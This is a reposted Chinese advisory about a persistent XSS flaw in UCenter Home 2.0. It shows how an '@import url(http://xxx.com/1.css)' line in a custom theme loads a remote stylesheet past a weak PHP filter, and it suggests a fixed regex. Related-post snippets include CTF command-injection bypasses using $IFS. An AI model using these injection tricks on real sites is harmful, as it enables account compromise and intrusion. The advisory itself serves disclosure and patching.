uchome 2.0 存在持久XSS漏洞

最新推荐文章于 2024-08-12 10:31:29 发布
最新推荐文章于 2024-08-12 10:31:29 发布
阅读量83 收藏
点赞数
文章标签: php javascript ViewUI
原文链接:http://www.cnblogs.com/52php/p/5658205.html
版权

发布时间2010-09-03

影响版本uchome 2.0

漏洞描述看源码分析的,出错位置较敏感,而且基本没有利用限制,个人主页自定义风格时,可@import外部css文件

测试方法

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

以下在uchome 简体utf-8 2.0测试IE6,IE7,IE8通过.

@import url(http://xxx.com/1.css); 包含远程css文件,可以在1.css中写入XSS利用.

分析代码 cp_theme.php 92行(17行调用)

function checksecurity($str) {

	//执行一系列的过滤验证是否合法的CSS
	$filter = array(
		'//*[

]*(.+?)[

]**//is',
		'/[^a-z0-9]+/i',
	);

	$str = preg_replace($filter, '', $str); //过滤是过滤了,但只用于判断,没对源输入起作用

	if(preg_match("/(expression|implode|javascript)/i", $str)) { //并没有对import、http等进行检测
		showmessage('css_contains_elements_of_insecurity');
	}

	return true;
}

安全建议:

临时解决方法

implode应该是import的笔误

/(expression|vbscript|javascript|import)/i

转载于:https://www.cnblogs.com/52php/p/5658205.html

weixin_30838873
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
UCHOME 2.0最终版完美整合QQ登录
08-26
此补丁只针对最终版的UCHOME2.0版本。其它版本略有不同,容后推出相应的补丁包 3. 目前此补丁包是接入QZone的,如果安装此补丁后不久就要转向DISCUZ/DISCUZX系列,那么请慎重选择此补丁,因为DISCUZ/DISCUZX是接入...
uchome2.0+一键转贴插件
11-06
uchome2.0+一键转贴插件 本插件由开源插件网(sns.zhisoo.com)提供。 激励的文章!奋斗的捷径!成功的法则!创业的技巧!奋进的环境! 更重要的是你可以找到与你志趣相同的网友!一起探讨奋斗的目标! 加入我们...
uchome持久XSS(2.0版本测试通过)
swordheart的博客
04-18 4545
漏洞详情 披露状态: 2010-07-31: 细节已通知厂商并且等待厂商处理中 2010-08-01: 厂商已经确认,细节仅向厂商公开 2010-08-04: 细节向第三方安全合作伙伴开放 2010-09-25: 细节向核心白帽子及相关领域专家公开 2010-10-05: 细节向普通白帽子公开 2010-10-15: 细节向实习白帽子公开 2010-08-30: 细节向公众公开 简要描述: 看源码分析的,出错位置较敏感,而且基本没有利用限制 详细说明: 个人主页自定义风格时,可@import外部
Discuz!uc.key泄露导致代码注入漏洞uc.php的解决方法
热门推荐
土著人宁巴的Discuz!专栏
04-06 1万+
漏洞名称:Discuz uc.key泄露导致代码注入漏洞 漏洞描述:在Discuz中,uc_key是UC客户端与服务端通信的通信密钥,discuz中的/api/uc.php存在代码写入漏洞,导致黑客可写入恶意代码获取uckey,最终进入网站后台,造成数据泄漏。您也可以登录官方网站更新到最新版本解决。 最近用某云服务器的朋友比较多,都来反馈~这个漏洞,现在把修复方案分享下吧 打开/api/uc
Ucenter Home SQL注入漏洞详细分析(需要GPC=OFF)
收集盒 Book box
05-16 1816
SQL Injection 1: 漏洞在文件\source\cp_profile.php <?php // .......省略....... //性别 $_POST['sex'] = intval($_POST['sex']); if($_POST['sex'] && empty($s
UCHome登陆验证机制分析
cpu521的专栏
09-18 147
1、登陆详解: A:用户填好登录表单之后数据被提交给source\do_login.php 处理 B:在do_login.php中下面这些语句接收传递来的用户名密码与cookie生效时间 view sourceprint? 1. $password = $_POST['password']; 2.$username = trim($_POST['username']); 3....
UCHOME2.0架构
programerwei的专栏
04-12 369
整体架构:UCHOME2.0并不是基于跟Ucenter一样的MVC模式来开发的,而是采用多点入口模式开发的。什么叫做多点入口呢?就是说整个程序只有固定的几个入口,这几个入口文件作为调度文件,他们就像一个传达室,根据传递不同的参数,他们调用不同的文件来处理你的请求。Uchome总共有如下入口:Index.php(主要负责首页数据的显示)space.php(主要负责数据的显示)
uchome 2.0登陆验证机制
ahstudy的专栏
12-05 610
Uchome2.0采用cookie+数据库的方式来进行用户登录验证的 1:登录 A:用户填好登录表单之后数据被提交 给source/do_login.php 处理 B:在do_login.php中下面这些语句接收传 递来的用户名密码与cookie生效时间 2.0登陆验证机制" border="0" height="69" width="382"> C:然后验证用户提交来的用户名以及密码的
Uchome2.0 WAP插件.rar
10-22
《Uchome2.0 WAP插件:深入解析与应用》 Uchome2.0 WAP插件是一款专为Uchome社区系统设计的移动访问增强工具,旨在优化用户在手机等移动设备上浏览社区论坛的体验。WAP(Wireless Application Protocol)是无线应用...
uchome支付插件 v2.0
10-06
【uchome支付插件 v2.0】是一个专为uchome社区平台设计的支付整合工具,旨在方便用户在uchome网站上进行各种在线交易活动。这个版本2.0的插件意味着它可能包含了对之前版本的改进和优化,以提供更稳定、安全的支付...
uchome2.0友情链接插件
03-16
《UCHome2.0友情连接插件详解及应用》 在互联网社区建设中,友链交换是提升网站知名度、增加流量的重要手段。UCHome作为一款知名的开源社区建站系统,其2.0版本中提供了友链插件,使得用户能够方便地管理与展示友链...
LNMP环境搭建论坛
qq_63652578的博客
08-07 999
root@Rocky8-node1 ~]# mv upload/* /usr/share/nginx/html/ #把upload下的所有内容移动到/usr/share/nginx/html/[root@Rocky8-node1 ~]# sed -i '/^group =/ c \group = nginx' /etc/php-fpm.d/www.conf #将组改为nginx。
[FSCTF 2023]细狗2.0
2301_81462177的博客
08-09 291
cmd=ls${lFS}-1剁FSS9-后面加个$与{类似,起截断作用,$9是当前系统shel进程第九个参数持有者始终为空字符串。cmd=lsSlFS-l单纯$IFS2,IFS2被bash解释器当做变量名,输不出来结果,加一个{}就固定了变量名。ca\t/*123*/f* 发现不可以,看题解后发现使用${IFS}绕过。cmd=ls$lFs$9-1 (这里1到9应该都可以)ca\t$IFS/f* 可得flag。尝试输入cat /f*
【信创】Linux系统如何使用命令行或图形化工具禁用ipv6 _ 统信 _ 麒麟 _ 中科方德
鹏大圣运维
08-09 1050
Hello,大家好啊,今天给大家带来一篇关于在Linux系统中如何使用命令行或Grub Customizer工具禁用IPv6的文章。IPv6在某些环境下可能会引起网络问题或不必要的复杂性,因此禁用它可能会提高系统的稳定性和性能。本文将详细介绍两种禁用IPv6的方法。欢迎大家分享转发,点个关注和在看吧!
PHP图书借阅微信小程序系统源码
最新发布
2401_84414018的博客
08-12 85
图书借阅微信小程序”不仅是一个借阅工具,更是你探索知识、享受阅读的得力助手。在这个快节奏的时代,让我们一起慢下来,用阅读滋养心灵,开启一段段美妙的阅读旅程吧!快来加入我们,发现更多阅读的乐趣和惊喜!📚🌟。
Linux安全与高级应用(四)深入探索MySQL数据库:安装、管理与安全实践
洛秋的博客
08-07 1454
Linux:作为操作系统,提供稳定的运行环境。Apache:作为Web服务器,处理HTTP请求。MySQL:作为数据库管理系统,存储和管理数据。:作为脚本语言,生成动态网页。LAMP平台的优势在于其成本低廉、可定制性强、易于开发、方便易用且安全稳定。这使得LAMP成为许多企业和开发者的首选平台。通过以上步骤,我们完成了LAMP平台的部署及其主要组件的配置和测试。LAMP平台的搭建不仅为Web开发提供了一个强大的环境,同时也展现了其在成本和效率上的优势。
ctfhub文件包含
a666666688的博客
08-07 573
文件的内容,通常这个文件包含一些敏感信息,比如CTF比赛中的flag。这样就可以通过浏览器或其他HTTP客户端看到。,直接访问这个URL将导致服务器读取并返回。
UChome2.0数据字典详解
"UChome2.0数据字典提供了关于UCHome数据库中各个表的详细信息,包括表的功能和各列属性。这份文档对于理解和维护UCHome2.0的数据库结构至关重要。" 在UCHome2.0数据字典中,我们可以看到不同表的结构及其用途,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值